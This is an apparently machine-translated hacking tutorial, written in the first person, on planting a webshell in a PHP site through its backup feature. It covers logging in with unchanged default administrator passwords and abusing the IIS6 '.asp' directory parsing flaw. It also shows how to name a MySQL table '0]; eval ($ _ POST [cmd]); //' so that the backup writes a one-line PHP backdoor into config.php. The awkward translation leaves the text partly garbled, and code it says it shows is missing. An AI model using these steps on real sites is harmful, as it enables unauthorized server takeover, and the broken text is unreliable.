The last time I saw ring3 H, I took WEBSHELL through this program, but he was very simple and had a function:
It is easy to replace directly. Not much. I will focus on how to use SHELL in a version without this function. It seems that many administrators love this and do not change the default password.
Not much nonsense. If MYSQL has been configured after entering, it is easy to handle and directly go up. If there is no database information configured and you have no target, you can use your own database and other websites, that's simple.
Let's talk about the parser separately. If you encounter IIS6 (which may be rare), you can directly create a. asp Directory,
The trojan is in 1.asp/ readme.txt.
Now let's focus on APACHE. After all, it is a PHP system, and this is the most
Step 1: select your MYSQL instance. Remember that it is a bit necessary. The first is to be able to connect externally, and the second is case sensitive! Otherwise it will be useless. Third, the table name can still contain the // symbol. I have been searching for it for a long time. Why does it need this symbol, which is defined by the PHP syntax?
Step 2: Create an empty database with an empty table created in it. The table name is 0]; eval ($ _ POST [cmd]); // as to why this name is used, don't explain, you know.
Step 3: It doesn't matter whether you back up the data or the directory name. No matter what the backup King prompts, you don't have to worry about it. If he says it fails, it will actually succeed.
One-sentence address: Backup Directory Name/config. php
Principle of utilization: during system backup, the table name will be written into the backup file. The contents of config. php are roughly as follows:
At that time, I thought about closing the quotation mark. I don't know what it is. I couldn't write the quotation marks. Then I went to bed and studied it the next day, there is a table name in the brackets below (thought! Eye widening). It hurts, so I gave up closing the quotation marks and wrote the statement to close the brackets below.